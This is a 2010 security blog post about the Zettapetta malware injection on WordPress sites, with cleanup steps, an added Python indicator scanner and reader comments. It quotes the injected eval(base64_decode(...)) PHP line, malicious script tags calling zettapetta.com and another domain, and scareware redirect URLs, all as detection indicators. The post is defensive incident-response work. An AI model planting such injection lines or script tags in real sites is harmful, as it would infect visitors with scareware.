Breaking News: WordPress Hacked with Zettapetta on DreamHost

Early this morning, we received reports that WordPress blogs were hacked on Linux shared hosting at DreamHost, as well as at other hosting companies. The injected code sends visitors to a scareware page that tries to install a virus on their computers.

WordPress, Zencart and other php-based platforms were hit. Our earliest hacked site report is of 5/6/2010 @ 9:17am.

This malware was only detected this morning and is not yet flagged by website malware scanners. We have notified sucuri.net of this latest infection so that they can update their malware detection systems immediately.

In no way am I bashing Network Solutions as a hosting company, but I had to share this video with you showing someone breaking into sites on their servers. This is why you need to take your website security seriously.

If you are hosting your WordPress blog at DreamHost or on another hosting company, please check your websites now to see if it has been infected.

Warning: Do not open your website in a browser unless your anti-virus program is up to date, your computer is virus free and you're on a secured network! The injected script is served to every visitor, including you.

Here's some of Zettapetta's behavior:

  • Your website is redirected to http://www1.firesavez5.com/?p=p52dcWpkbmmHjsbIo216h3de0KCf........ or
    http://www1.firesavez6.com/?p=p52dcWpkbG6HjsbIo...
  • The redirect page appears blank. Its source code contains the following:

    <h1>404 Not Found</h1>The page that you have requested could not be found.
  • All .php files in your WordPress installation contain the following injected code: <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9z..... (the visible part of the base64 string decodes to if(function_exists('ob_s, i.e. the payload begins with a check for PHP's output-buffering functions).
  • Near the bottom of the page source produced by those .php files is the following script: <script src="http://zettapetta.com/js.php"></script> and <script src="http://www.indesignstudioinfo.com/ls.php"> .
  • Your antivirus program blocks the installation of the threat: a www.firesavez5.com or www.firesaver6.com installer.

How to fix your hacked WordPress site infected with this malware. Before you try this, please read the QUICK FIX update below!

  1. Immediately remove the index.php file from the root of your WordPress installation.
  2. Add a temporary index.html file to the root of your website stating that the site is down for maintenance. (There's no reason to say your site is infected and scare visitors whose computers haven't been infected.) If you don't know how to make your own, you can use our index maintenance page on your own site: unzip the file, upload it to your server and rename it to index.html.
  3. Go into your "File Manager" or FTP client and find out the date and time your site was hacked. You can tell by looking at your .php files: they will most likely all share the same modification date and time. (To help spread awareness, please leave a comment below or email us this information so we can track the attack and warn our readers.)
  4. Make sure you have a backup of your website taken before that date and time; you will need it to reinstall your site. A backup made after the infection contains the injected code as well.
  5. Open your wp-content/plugins folder on your server and write down the names of all the plugins installed on your site.
  6. Make sure you have a backup of all your images and media, usually located in wp-content/uploads. You will need them to put your site back to normal.
  7. Delete your entire WordPress site from your server. If you have multiple sites on the same hosting account, you will have to do the same with them too; don't just clean one. A site left infected can reinfect the ones you've fixed.
  8. Go to http://wordpress.org and download a fresh copy of the latest version of WordPress.
  9. Unzip the download and upload it to your website via file manager or FTP. If your host offers SFTP or FTPES, use it instead of plain FTP: it encrypts the connection so your password and files can't be read off the wire.
  10. Upload your backed-up copy of wp-config.php to the root of your WordPress installation. This is the file that connects to your database, so your posts, pages, settings, etc. work again. Open it in a text editor first and make sure it does not contain the eval(base64_decode(...)) line: the infection writes to every .php file, including this one.
  11. Upload your images and/or media back to the server. They are usually in your backed-up copy of wp-content/uploads, unless you chose to house your media in another folder. It contains all the images you've added to your posts from within wp-admin. If you don't have a backup of this directory, you will have to re-upload all your images to your posts and pages. Yes, I know... nightmare!
  12. Upload your backed-up copy of your theme into the wp-content/themes directory. A theme is .php files too, so check them for the injected code first, or download the theme fresh from its author.
  13. Take the list of plugins you wrote down, download fresh copies from http://wordpress.org to your computer and upload them to your website. Note: you may have to reactivate or reconfigure your plugins, but it sure beats losing everything.
  14. Try logging into your WordPress wp-admin section to see if everything looks okay.
  15. Visit your home page and try clicking some links to see if they work. If you get 404 errors when opening a post or page, go to wp-admin and update your permalinks: click Settings > Permalinks > Save Changes. Whew, that was easy. Now go check that your links work.
  16. Go to your server and make sure the correct permissions are set. All directories should be at most 755, and all files (php, images, html, etc.) at most 644. Note: Never set any directory to 777, even when a plugin's instructions recommend it; that makes it writable by every other account on the shared server.
  17. Change all your passwords (WordPress users, FTP, database and hosting account) to strong ones, and don't reuse the same one!
  18. If you need help fixing your site, we can remove the malware and restore your WordPress for you. Contact us for more details.
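To turn the indicators from the behavior list and steps 3 and 10 above into something you can run against a site tree, here is an added example written for this page. It is not the original post's code, not David Dede's wordpress-fix.php and not a Sucuri tool. It walks a WordPress install, flags files carrying the quoted markers, reports modification times so the infection time stamp can be read off the cluster (step 3), base64-decodes the eval() argument for triage, and strips the known markers from a file. Assumptions: the injection is a single <?php ... ?> block ending in ")); ?>" (the post only shows its truncated start), and the sample files, payload and time stamp are constructed for the example; only the markers themselves and the decoded prefix if(function_exists('ob_s come from the post.

```python
# Zettapetta indicator scanner: added example for this page, not the post's code.
import base64, binascii, os, re, tempfile
from collections import Counter
from datetime import datetime

# Markers quoted in the post. That the PHP injection is one "...")); ?>" block
# is an assumption based on the truncated snippet.
PHP_INJECTION = re.compile(
    rb'<\?php\s*/\*\*/\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);\s*\?>')
SCRIPT_TAG = re.compile(
    rb'<script\s+src="https?://(?:www\.)?'
    rb'(zettapetta\.com/js\.php|indesignstudioinfo\.com/ls\.php)"\s*>(?:\s*</script>)?',
    re.IGNORECASE)
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js")

# Constructed stand-in payload: only "if(function_exists('ob_s" comes from the post.
SAMPLE_PAYLOAD_SOURCE = b"if(function_exists('ob_start')){ /* constructed stand-in */ }"
SAMPLE_PAYLOAD_B64 = base64.b64encode(SAMPLE_PAYLOAD_SOURCE)
SAMPLE_MTIME = 1273137420.0  # 2010-05-06 09:17 UTC, mirroring the earliest report


def decode_payload(b64: bytes) -> str:
    """Decode the eval() argument for triage; tolerates a truncated string."""
    b64 = b64.rstrip(b"=")
    if len(b64) % 4 == 1:  # a lone trailing sextet carries no complete byte
        b64 = b64[:-1]
    try:
        raw = base64.b64decode(b64 + b"=" * (-len(b64) % 4))
    except binascii.Error:
        return ""
    return raw.decode("utf-8", errors="replace")


def scan_file(path: str):
    """Return a finding dict for an infected file, or None if no marker is present."""
    with open(path, "rb") as fh:
        data = fh.read()
    php = PHP_INJECTION.search(data)
    tags = sorted({m.group(1).decode().lower() for m in SCRIPT_TAG.finditer(data)})
    if php is None and not tags:
        return None
    return {"path": path,
            "mtime": datetime.fromtimestamp(os.path.getmtime(path)),
            "payload_prefix": decode_payload(php.group(1))[:40] if php else "",
            "script_tags": tags}


def scan_tree(root: str) -> list:
    """Walk the install and collect findings, sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXTENSIONS):
                hit = scan_file(os.path.join(dirpath, name))
                if hit:
                    findings.append(hit)
    return sorted(findings, key=lambda f: f["path"])


def infection_times(findings: list) -> list:
    """Step 3: injected files share one mtime. Returns (minute, count), most common first."""
    return Counter(f["mtime"].replace(second=0, microsecond=0) for f in findings).most_common()


def strip_injection(data: bytes) -> bytes:
    """Remove only the known markers. Anything else the attacker left (a backdoor,
    an altered plugin) stays, which is why the post reinstalls from clean copies."""
    return SCRIPT_TAG.sub(b"", PHP_INJECTION.sub(b"", data))


def build_sample_tree(root: str) -> None:
    """Write the constructed sample: two infected files, one clean, all one mtime."""
    os.makedirs(os.path.join(root, "wp-content", "themes"))
    injected = b'<?php /**/ eval(base64_decode("' + SAMPLE_PAYLOAD_B64 + b'")); ?>\n'
    tag = b'<script src="http://zettapetta.com/js.php"></script>\n'
    files = {"index.php": injected + b"<?php require './wp-blog-header.php'; ?>\n" + tag,
             "wp-config.php": injected + b"<?php define('DB_NAME', 'wp'); ?>\n",
             os.path.join("wp-content", "themes", "clean.php"): b"<?php echo 'ok'; ?>\n"}
    for rel, body in files.items():
        full = os.path.join(root, rel)
        with open(full, "wb") as fh:
            fh.write(body)
        os.utime(full, (SAMPLE_MTIME, SAMPLE_MTIME))


def run_sample_scan() -> dict:
    """Build the sample in a temp dir, scan it, and summarise the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        hits = scan_tree(tmp)
        return {"infected": [os.path.relpath(h["path"], tmp) for h in hits],
                "tags": {os.path.basename(h["path"]): h["script_tags"] for h in hits},
                "prefix": hits[0]["payload_prefix"] if hits else "",
                "times": infection_times(hits)}


if __name__ == "__main__":
    result = run_sample_scan()
    for rel in result["infected"]:
        print("INFECTED", rel, result["tags"][os.path.basename(rel)])
    print("payload starts:", result["prefix"], "| infection time:", result["times"][0])
```

Run it as-is to see the constructed sample, or call scan_tree with the path of your site's root (over SSH on the server, or on a downloaded copy): the most common minute returned by infection_times is the date and time step 3 asks you to record, and the decoded prefix tells you whether a file carries this family or something else. strip_injection is for triage only: it removes the markers the post quotes and nothing else, so a tree it has cleaned still has to be reinstalled from clean copies as the steps describe.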

Now that you've recovered your website, make sure you're running the latest version of WordPress. If you'd like detailed instructions on how to upgrade your WordPress installation, click here.

We need your help...

This new http://zettapetta.com/js.php malware was discovered this morning thanks to a report from Thomas. Please help spread awareness and come together as a community for safe websites and browsing. Be sure to tweet this post and share it on Facebook. If you find any information on this new issue, please leave a comment below so we can all help each other.

UPDATE 5/7/2010 at 12:15pm: David Dede of Sucuri.net has written up this attack and decoded the injected script.

Read his post here

See the decoded script here

Be first to know if anything has changed on your website or you have any malicious malware, get the Web Monitoring Service from Sucuri.net. You can sign-up with our discount affiliate link for only $7.99/month, click here.

UPDATE 5/7/2010 at 4:00pm: If your site is hosted at Go Daddy and you think it may have been compromised, please contact the Go Daddy Security Team here:

http://www.godaddy.com/securityissue

QUICK FIX - UPDATE 5/7/2010 at 5:00 pm: According to David Dede, this attack has a quick fix. He has written instructions for cleaning a WordPress site hacked with Zettapetta. CLICK HERE.

P.S. Thanks David! You Rock!

Go Daddy also responds to this attack - Read our latest post here.

Securely yours,

Regina Smola
Follow me on Twitter
Follow WPSecurityLock on Twitter

Join us on May 19th for a WordPress Security Teleseminar!

You can still listen to our WordPress Security Teleseminar replay with special guest Scott from Go Daddy, recorded on May 5, 2010. And sign up for our WordPress Security Teleseminar on May 19, 2010 at 9pm EST. Participate live from anywhere in the world. Click Here To Register Now!


About Regina Smola
Regina Smola is a sought-after WordPress Security expert. She offers training seminars on how to secure self-hosted WordPress websites, as well as providing security services for both new and existing WordPress blogs.

Comments

  1. Luke says:

    My MediaTemple WordPress site was hacked. I think it may be a virus that installed on my XP machine and stole my FTP password, because my XP machine was infected a few hours before I received the first email saying there was a virus on my site.

    But aren't your instructions missing a step? You have no step saying how to put back all your posts, comments, etc.!

    • Regina says:

      Hi Luke,

      Thanks for your comment. Sorry to hear your WordPress was hacked. This may be part of the virus you received or the new string of attacks that are being reported. We just posted it here: http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-losotrana-on-godaddy-and-mediatemple/.

      We have received reports from webmasters that got their machines infected and had their FTP passwords stolen. You must keep a clean computer at all times. Clean your computer and then go and change all your passwords immediately.

      As far as my steps go, the database houses your posts, comments, etc. so those will still remain in the database and will not affect the restoration of your server files.

      Hope that helps.

  2. MacMyDay says:

    looks like not only did my WordPress sites get hacked, but my Movable Type installation and its php files were all affected too. My hack was May 6, 2010 1:38pm at Dreamhost shared server.

  3. si says:

    I have discovered I have problems with 3 domains on my hostgator account.

    On each domain (they are all WordPress) the home page has disappeared. When I recreate the page it appears fine but then disappears shortly afterwards. I thought using a post as the home page would be a temporary solution. That appeared OK until tonight when I edited the page and published it and about 99% of the content disappeared immediately.

    I discovered this problem on Tuesday 18th but don't know exactly when it started. I was working on one of the corrupted blogs at the weekend and all was fine.

    I don't think it is a plugin that has caused this as I tend to have the same plugins on most of my domains.

    I have reported it to HG. Any ideas? Looks like a different problem to the one discussed here?

    Thanks

    Si

    • Regina says:

      Hi Si,

      I just checked your website and it loads fine on my screen. I can see your home page fine. Maybe try clearing cache/cookies and see if that helps. I also did a malware scan and your site is clear and blacklist free :)

      Feel free to send me an email on our "Contact" page and provide the other domains to check.

  4. Tracey says:

    It seems my site was hacked, but it is hosted at Wiredtree on a VPS.

  5. Stan says:

    I think we've got a variation of this kind of thing in one old unmaintained Mambo CMS installation. The hack came in through the file manager in the TinyMCE editor. This happened on 21 May.
    Details here: http://www.lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/

  6. Amy says:

    My website hosted by Dreamhost was attacked by Zettapetta on May 19. Unfortunately I didn't get the timestamp. Thank you so much for this information, and especially to David Dede for the wordpress-fix.php.

  7. Tove says:

    Hi

    Thanks to the quick fix, I got rid of zettapetta two weeks ago.

    But now the same is happening again. This time the URL in the script is domainameat[dot]cc/js2[dot]php

    Google diagnostics says I am hacked with glory4[dot]co[dot]cc

    Has anybody else experience with this one ?

    Tove - getting tired :(

  8. nerudo says:

    Well, I haven't been using my company website for quite some time, till yesterday when I thought to update the information and do some major SEO. As I was just reading the content I discovered something had been changed and pages restructured and deleted. I went on to check my address and also discovered my contact number had a 6 added to it. Looking up some of my links, I discovered that on one of the pages there was a change to my contact us link. There was a contact us link that led to http://www.rankforsales.com/contact-us; this was sure evidence that these guys had something to do with the attack on my site. When I researched who they were I discovered they also have a penetration test service, which sure makes them hackers. I don't know what to do because my host won't help me in any way, since they blame the user for any attacks and say the user has the duty to protect their site. My website is hosted on Hertzner.co.za, which is a South African company.

    One other thing: the person also managed to create a user account, which he then used to redo all my content and hijack all my content. When I went into the subscriber panel of my WP site I deleted the dubious user account and later realized all the major parent pages weren't there anymore, which led me to think, oh, that dubious account was involved in the attack. What I would like to know is, is there a way one could hack into an account, create a user and then hijack all the content?

    Please help

    • Regina Smola says:

      Hello Nerudo,

      Sounds like you have had some major trouble on your website. Hackers are crafty and can do many things to mess up a website. Please send me an email so we can chat.

  9. My WordPress website hosted on Godaddy also got infected. I have reinstalled many times, but it was no use. Any permanent solutions for it?

  10. I wish much more people could generate websites like this that are literally enjoyable you just read. With the nonsense floating round on the web, it truly is extraordinary you just read a weblog such as this instead

Trackbacks

  1. [...] website WP Security Lock posted detection instructions as well. Here’s some of Zettapetta’s behavior: Your [...]

  2. [...] Andy on Jun.09, 2010, under General Last Saturday my Blog was hacked with the ZettaPetta hack. basically all my PHP files had some malicious code injected [...]

  3. [...] The guys from WP security lock did a good thread on the issue. You can read here [...]
